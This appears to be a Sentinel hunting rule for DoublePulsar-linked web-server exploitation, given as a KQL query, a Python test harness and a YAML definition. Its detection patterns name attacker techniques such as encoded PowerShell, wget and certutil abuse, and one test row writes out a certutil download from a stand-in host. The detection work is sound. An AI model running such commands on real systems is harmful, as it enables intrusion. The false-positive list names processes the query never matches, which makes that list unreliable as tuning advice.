The Doublepulsar backdoor, associated with NSA-developed malware, may be used by adversaries to establish persistent remote access and exfiltrate data from compromised web servers. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential advanced persistent threats and mitigate data exfiltration risks.
KQL Query

```kusto
DeviceProcessEvents
| where Timestamp >= ago(7d)
// "Grandparent" or parent process is Oracle WebLogic (beasvc.exe), or the parent loads Confluence
| where InitiatingProcessParentFileName == "beasvc.exe"
    or InitiatingProcessFileName == "beasvc.exe"
    or InitiatingProcessCommandLine contains "//confluence"
// Share of uppercase characters in the command line: a rough Base64 heuristic,
// used only by the clause that is commented out further down
| extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"),
         Total = countof(ProcessCommandLine, ".", "regex")
| extend Ratio = todouble(Caps) / todouble(Total)
| where
    (
        FileName in~ ("powershell.exe", "powershell_ise.exe") // PowerShell is spawned
        // Omit known clean processes (environment-specific; tune these for your tenant)
        and ProcessCommandLine !startswith "POWERSHELL.EXE -C \"GET-WMIOBJECT -COMPUTERNAME"
        and ProcessCommandLine !contains "ApplicationNo"
        and ProcessCommandLine !contains "CustomerGroup"
        and ProcessCommandLine !contains "Cosmos"
        and ProcessCommandLine !contains "Unrestricted"
        and
        (
            ProcessCommandLine contains "$" // PowerShell variable declaration
            or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
            or ProcessCommandLine contains "encodedcommand"
            or ProcessCommandLine contains "wget"
            //or (Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
        )
    )
    or
    (
        FileName =~ "cmd.exe" // cmd.exe is spawned
        and ProcessCommandLine contains "@echo"
        and ProcessCommandLine contains ">" // Echoing commands into a file
    )
    or
    (
        FileName =~ "certutil.exe" // CertUtil.exe abuse
        and ProcessCommandLine contains "-split" // the "-split" parameter is required to write files to disk
    )
| project
    Timestamp,
    InitiatingProcessCreationTime,
    DeviceId,
    Grandparent_PID = InitiatingProcessParentId,
    Grandparent = InitiatingProcessParentFileName,
    Parent_Account = InitiatingProcessAccountName,
    Parent_PID = InitiatingProcessId,
    Parent = InitiatingProcessFileName,
    Parent_Commandline = InitiatingProcessCommandLine,
    Child_PID = ProcessId,
    Child = FileName,
    Child_Commandline = ProcessCommandLine
```
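The two filter stages of the query above, re-implemented in Python over constructed DeviceProcessEvents rows so that the exclusion list and the commented-out Base64 ratio can be unit-tested before the Sentinel rule is changed. This is an added example, not code from the published query; the sample rows, the `KNOWN_CLEAN` / `PS_INDICATORS` names and the `hunt` helper are assumptions made here.

```python
# Offline model of the hunt's two filter stages, so tuning (new exclusions, the
# commented-out Base64 ratio) can be unit-tested on constructed rows before the
# Sentinel rule is edited. Added example, not part of the published query.
import re
KNOWN_CLEAN = ("applicationno", "customergroup", "cosmos", "unrestricted")
PS_INDICATORS = ("$", "-e ", "encodedcommand", "wget")
COLS = ("InitiatingProcessParentFileName", "InitiatingProcessFileName",
        "InitiatingProcessCommandLine", "FileName", "ProcessCommandLine")

def uppercase_ratio(cmdline):
    """Mirror of the Caps/Total extend: share of uppercase ASCII letters."""
    total = len(re.findall(".", cmdline))
    return len(re.findall("[A-Z]", cmdline)) / total if total else 0.0

def suspicious_parent(row):
    """Stage 1: parent or grandparent is WebLogic, or the parent loads Confluence."""
    return (row["InitiatingProcessParentFileName"] == "beasvc.exe"
            or row["InitiatingProcessFileName"] == "beasvc.exe"
            or "//confluence" in row["InitiatingProcessCommandLine"].lower())

def suspicious_child(row, base64_ratio=False):
    """Stage 2: PowerShell, cmd.exe or certutil.exe child carrying an indicator."""
    # KQL contains/startswith/in~/=~ are case-insensitive (only == is not), so lowercase first.
    name, cmd = row["FileName"].lower(), row["ProcessCommandLine"].lower()
    if name in ("powershell.exe", "powershell_ise.exe"):
        if cmd.startswith('powershell.exe -c "get-wmiobject -computername') \
                or any(s in cmd for s in KNOWN_CLEAN):
            return False  # known-clean exclusions from the query
        ratio_hit = base64_ratio and 0.4 < uppercase_ratio(row["ProcessCommandLine"]) < 1.0
        return any(k in cmd for k in PS_INDICATORS) or ratio_hit
    if name == "cmd.exe":
        return "@echo" in cmd and ">" in cmd
    if name == "certutil.exe":
        return "-split" in cmd
    return False

def hunt(rows, **opts):
    return [r["ProcessCommandLine"] for r in rows
            if suspicious_parent(r) and suspicious_child(r, **opts)]

# Constructed rows (grandparent, parent, parent cmd, child, child cmd); not real telemetry.
SAMPLE_ROWS = [dict(zip(COLS, t)) for t in [
    ("beasvc.exe", "java.exe", "java -jar weblogic.jar", "powershell.exe",
     "powershell.exe -EncodedCommand QQBCAEMA"),                        # match
    ("beasvc.exe", "java.exe", "java -jar weblogic.jar", "powershell.exe",
     "powershell.exe -File C:\\jobs\\Cosmos\\sync.ps1 $env:x"),         # known clean
    ("services.exe", "tomcat9.exe", "tomcat9.exe //confluence", "certutil.exe",
     "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"),  # match
    ("beasvc.exe", "cmd.exe", "cmd.exe /c run.bat", "cmd.exe",
     "cmd.exe /c @echo hello > C:\\temp\\x.bat"),                       # match
]]
```

Run `hunt(SAMPLE_ROWS)` to see which constructed rows survive both stages, and `hunt(SAMPLE_ROWS, base64_ratio=True)` to try the disabled ratio heuristic before re-enabling it in KQL.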
```yaml
id: da3b2b82-74a0-4b0e-8ef7-ac43515b4c70
name: detect-web-server-exploit-doublepulsar
description: |
  This query was originally published in the threat analytics report, Motivated miners.
  Doublepulsar is a backdoor developed by the National Security Agency (NSA). First disclosed in 2017, it is now used by many malicious actors. Software patches are available.
  The following query detects activity broadly associated with campaigns that use DoublePulsar to exploit web servers.
  See Detect DoublePulsar execution for a query that detects possible DoublePulsar execution events.
  References:
  https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DoublePulsar&threatId=-2147239036
  https://www.scmagazine.com/home/security-news/cybercrime/doublepulsar-malware-spreading-rapidly-in-the-wild-following-shadow-brokers-dump/
  https://support.microsoft.com/help/4013389/title
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
tactics:
  - Execution
query: |
  DeviceProcessEvents
  | where Timestamp >= ago(7d)
  // "Grandparent" or parent process is Oracle WebLogic (beasvc.exe), or the parent loads Confluence
  | where InitiatingProcessParentFileName == "beasvc.exe"
      or InitiatingProcessFileName == "beasvc.exe"
      or InitiatingProcessCommandLine contains "//confluence"
  // Share of uppercase characters in the command line (Base64 heuristic)
  | extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"),
           Total = countof(ProcessCommandLine, ".", "regex")
  | extend Ratio = todouble(Caps) / todouble(Total)
  | where
      (
          FileName in~ ("powershell.exe", "powershell_ise.exe") // PowerShell is spawned
          // Omit known clean processes
          and ProcessCommandLine !startswith "POWERSHELL.EXE -C \"GET-WMIOBJECT -COMPUTERNAME"
          and ProcessCommandLine !contains "ApplicationNo"
          and ProcessCommandLine !contains "CustomerGroup"
          and ProcessCommandLine !contains "Cosmos"
          and ProcessCommandLine !contains "Unrestricted"
          and
          (
              ProcessCommandLine contains "$" // PowerShell variable declaration
              or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
              or ProcessCommandLine contains "encodedcommand"
              or ProcessCommandLine contains "wget"
              //or (Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
          )
      )
      or
      (
          FileName =~ "cmd.exe" // cmd.exe is spawned
          and ProcessCommandLine contains "@echo"
          and ProcessCommandLine contains ">" // Echoing commands into a file
      )
      or
      (
          FileName =~ "certutil.exe" // CertUtil.exe abuse
          and ProcessCommandLine contains "-split" // the "-split" parameter is required to write files to disk
      )
  | project
      Timestamp,
      InitiatingProcessCreationTime,
      DeviceId,
      Grandparent_PID = InitiatingProcessParentId,
      Grandparent = InitiatingProcessParentFileName,
      Parent_Account = InitiatingProcessAccountName,
      Parent_PID = InitiatingProcessId,
      Parent = InitiatingProcessFileName,
      Parent_Commandline = InitiatingProcessCommandLine,
      Child_PID = ProcessId,
      Child = FileName,
      Child_Commandline = ProcessCommandLine
```
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Ensure this data connector is enabled |
- Scenario: Legitimate scheduled system backup using the Windows Server Backup tool.
  Filter/Exclusion: Check for ProcessName = "wbadmin.exe" and CommandLine contains "backup", and ensure the backup path is within the organization's sanctioned backup directories.
- Scenario: Admin performing remote PowerShell remoting to manage servers.
  Filter/Exclusion: Filter out PowerShell remoting sessions (ProcessName = "powershell.exe") where the command line includes -Command or -File and the script path is within the enterprise's allowed PowerShell script repository.
- Scenario: Scheduled job running a legitimate security tool such as Microsoft Defender for Endpoint.
  Filter/Exclusion: Exclude processes with ProcessName = "MsMpEng.exe" or ProcessName = "WindowsDefender.exe" and verify the command line includes known Defender-related tasks or scheduled scan commands.
- Scenario: Internal development team deploying a custom web server module using IIS Manager.
  Filter/Exclusion: Filter out activities involving ProcessName = "iisexpress.exe" or ProcessName = "inetmgr.exe" and check for known internal development tools or paths within the organization's development environment.
- Scenario: IT team performing a patch deployment using Microsoft System Center Configuration Manager (SCCM).
  Filter/Exclusion: Exclude processes with ProcessName = "ccmexec.exe" or ProcessName = "smsts.exe" and verify the deployment is associated with a known patching task or update schedule.